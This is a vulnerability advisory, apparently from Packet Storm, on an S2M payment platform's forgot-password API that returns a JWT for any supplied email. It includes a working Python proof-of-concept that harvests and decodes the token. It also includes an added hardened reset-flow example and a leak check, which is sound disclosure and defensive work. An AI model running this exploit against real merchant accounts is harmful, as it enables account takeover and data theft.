Description
This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M, a company specializing in secure electronic transactions and payment processing solutions. The script sends a...
Basic Information
ID
PACKETSTORM:220754
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://s2mworldwide.com/en/ |
==================================================================================================================================
[+] Summary : This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M,
a company specializing in secure electronic transactions and payment processing solutions.
The script sends a crafted POST request using a known email address and attempts to retrieve a JWT (JSON Web Token) directly from the server response without proper verification.
[+] If successful, the script:
Extracts and displays the full JWT token
Decodes the token payload (base64)
Parses and prints sensitive information, including:
User-related data
Account status (userStatus)
Token expiration time (exp)
[+] Security Impact:
This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
Account Takeover
Sensitive Information Disclosure
Weak Password Reset Mechanism
[+] POC :
import requests
import urllib3
import json
import base64
from datetime import datetime

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
EMAIL = "[email protected]"


def decode_jwt_payload(token):
    """Decode the middle (payload) part of the JWT to display the data.
    This only base64-decodes the claims; it does not verify the signature."""
    try:
        parts = token.split('.')
        if len(parts) != 3:
            return "Invalid token format"
        payload = parts[1]
        # JWT segments are base64url without padding: restore the padding, then decode
        payload += '=' * (-len(payload) % 4)
        decoded = base64.urlsafe_b64decode(payload).decode('utf-8')
        return json.loads(decoded)
    except Exception as e:
        return f"Token content extraction failed: {e}"


def get_full_token():
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/json"
    })
    try:
        print(f"[*] Extracting full account token: {EMAIL}")
        res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
        data = res.json()
        token = data.get('token')
        status = data.get('userStatus')
        if token:
            print("\n" + "="*30 + " Full token (JWT) " + "="*30)
            print(token)
            print("="*81 + "\n")
            print("[*] Token Content Parsing (Decoded Payload):")
            payload_info = decode_jwt_payload(token)
            print(json.dumps(payload_info, indent=4, ensure_ascii=False))
            print(f"\n[!] Current User Status: {status}")
            # only a successfully decoded payload is a dict that can carry an 'exp' claim
            if isinstance(payload_info, dict) and 'exp' in payload_info:
                exp_date = datetime.fromtimestamp(payload_info['exp'])
                print(f"[!] Token valid until: {exp_date}")
        else:
            print("[-] No token found in server response.")
            print(f"[*] Full response: {data}")
    except Exception as e:
        print(f"[X] Error: {e}")


if __name__ == "__main__":
    get_full_token()
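The root cause described under Security Impact is that the forgot-password endpoint answers a bare e-mail address with a bearer token and account status. The following is an added example, not the vendor's code and not part of the original advisory: a constructed stand-in for that response shape (forgot_password_vulnerable) next to a hardened two-step reset flow that returns the same body for known and unknown addresses, delivers a single-use secret only out of band, stores only its hash, and enforces expiry. The Account/ResetRecord types, the outbox list standing in for e-mail delivery, the 15-minute TTL and the SHA-256 password placeholder are all assumptions of the example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass

RESET_TTL_SECONDS = 15 * 60  # reset links stay valid for 15 minutes (assumed policy)


@dataclass
class Account:
    email: str
    password_hash: str
    user_status: str = "ACTIVE"


@dataclass
class ResetRecord:
    token_hash: str   # SHA-256 of the raw token; the raw value is never stored server-side
    expires_at: float
    used: bool = False


class ResetFlow:
    def __init__(self, accounts, clock=time.time):
        self.accounts = {a.email.lower(): a for a in accounts}
        self.pending = {}    # e-mail -> ResetRecord
        self.outbox = []     # (e-mail, raw token): stand-in for the out-of-band e-mail channel
        self.clock = clock   # injectable so expiry can be tested deterministically

    def forgot_password_vulnerable(self, email):
        """Constructed stand-in for the pattern the PoC reads: a bearer token and the
        account status are handed back in the HTTP response to whoever supplies an
        e-mail address, and unknown addresses get a different answer (enumeration)."""
        acct = self.accounts.get(email.lower())
        if acct is None:
            return {"error": "user not found"}
        return {"token": secrets.token_urlsafe(32), "userStatus": acct.user_status}

    def forgot_password(self, email):
        """Hardened handler: the response body is identical whether or not the address
        exists, the secret only travels out of band, and only its hash is stored."""
        acct = self.accounts.get(email.lower())
        if acct is not None:
            raw = secrets.token_urlsafe(32)
            self.pending[acct.email.lower()] = ResetRecord(
                token_hash=hashlib.sha256(raw.encode()).hexdigest(),
                expires_at=self.clock() + RESET_TTL_SECONDS,
            )
            self.outbox.append((acct.email, raw))
        return {"message": "If that address is registered, a reset link has been sent."}

    def reset_password(self, email, raw_token, new_password):
        """Second step: accept the reset only for an unexpired, unused token whose hash
        matches; the comparison is constant-time and the record is burned on success."""
        rec = self.pending.get(email.lower())
        if rec is None or rec.used or self.clock() > rec.expires_at:
            return False
        presented = hashlib.sha256(raw_token.encode()).hexdigest()
        if not hmac.compare_digest(rec.token_hash, presented):
            return False
        rec.used = True
        # Placeholder password hashing for the example; use argon2/bcrypt/scrypt in production.
        self.accounts[email.lower()].password_hash = hashlib.sha256(new_password.encode()).hexdigest()
        return True


def response_leaks_secret(response):
    """Check a defender can run against a forgot-password response body: it must carry
    neither a bearer token nor account-state details such as userStatus."""
    return any(k in response for k in ("token", "userStatus"))


if __name__ == "__main__":
    flow = ResetFlow([Account("merchant@example.com", "<hash>")])  # constructed account
    print("vulnerable:", flow.forgot_password_vulnerable("merchant@example.com"))
    print("hardened:  ", flow.forgot_password("merchant@example.com"))
    print("unknown:   ", flow.forgot_password("nobody@example.com"))
```

The uniform response closes the enumeration side channel, and because the server keeps only a hash, a database read of the pending table yields nothing usable; a leaked raw token is bounded by the TTL and by single use.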
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================